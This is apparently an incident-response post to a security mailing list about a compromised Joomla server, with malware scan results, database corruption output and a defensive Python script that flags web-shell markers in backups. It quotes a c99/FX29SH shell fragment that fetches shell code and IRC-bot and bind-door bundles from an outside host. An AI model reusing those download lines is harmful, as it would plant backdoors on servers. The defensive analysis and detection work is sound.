Team, a forum post we can refer to on what the cracker(s) did to our servers:
http://forum.joomla.org/viewtopic.php?p=2518912&sid=1f09664d13627db3131ef72b6cccbc71#p2518912

One of the posts:

"You also need to remove every file, cron job, sub domains, directories, etc. from your domain."

"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected. I've downloaded the backups I have from cPanel, unzipped them and scanned them with Norton anti-virus (I'm on a Mac). I did the same with the public_HTML folder. The backups had trojans.

Take a closer look at some of the posts. While it is possible that the server has another account hacked, it is likely originating from this account.

There are several scripts here, an injector script and an uploader script:

{HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457
hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that the hacker has installed or linked to c99 and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just generated and this virus was found in the homedir.tar and the hableda1.tar.gz (I scanned both the zipped and unzipped files): backdoor.IRC.bot.

Evidence that the attempts to use the site for malware/spam/other purposes continue:

There is a lot of POST requests to the index page from the IP address xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.

_______________
We can discuss this at OWASP.my Discussion Group in Facebook
https://www.facebook.com/groups/owaspmy/
_______________________________________________
OWASP-Malaysia mailing list
[email protected]
https://lists.owasp.org/mailman/listinfo/owasp-malaysia
OWASP Malaysia Wiki http://www.owasp.my
OWASP Malaysia Facebook http://www.facebook.com/OWASP.Malaysia
OWASP Malaysia Twitter #owaspmy http://www.twitter.com/owaspmy
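A small triage script, added here as an example and not taken from the forum thread or the OWASP list: it walks an unpacked cPanel backup (e.g. the extracted public_html) and flags PHP files that carry the markers quoted above (the FX29SH/c99 shell variables, the psyBNC/Eggdrop/BindDoor bundle names, eval-of-base64 injectors and raw upload handlers). The pattern names and heuristics are my assumptions; a hit is a lead for manual review, not proof of compromise, since legitimate extensions can also call move_uploaded_file.

```python
import os
import re
from typing import Dict, List

# Indicator patterns taken from the markers quoted in the thread; the
# category names are constructed for this example.
WEBSHELL_PATTERNS = {
    "fx29sh/c99 shell": re.compile(r"FX29SH|fx29sh_|c99\.(php|txt)|\$sh_mainurl", re.I),
    "irc-bot bundle": re.compile(r"psyBNC|Eggdrop|BindDoor", re.I),
    "base64 eval injector": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # Weak indicator: core Joomla and many extensions also use this call.
    "upload handler": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES", re.I),
}


def scan_php_source(source: str) -> List[str]:
    """Return the names of every indicator pattern found in one PHP source text."""
    return [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(source)]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk an unpacked backup and map each flagged file (relative path) to its indicators."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_php_source(fh.read())
            except OSError:
                continue  # unreadable file: skip, keep scanning the rest of the tree
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


if __name__ == "__main__":
    import sys

    # Usage: python scan_backup.py /path/to/unpacked/public_html
    for rel_path, found in sorted(scan_tree(sys.argv[1]).items()):
        print(f"{rel_path}: {', '.join(found)}")
```

Files living where Joomla keeps no PHP at all (media/system/ in the thread) deserve a look even without a pattern hit.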

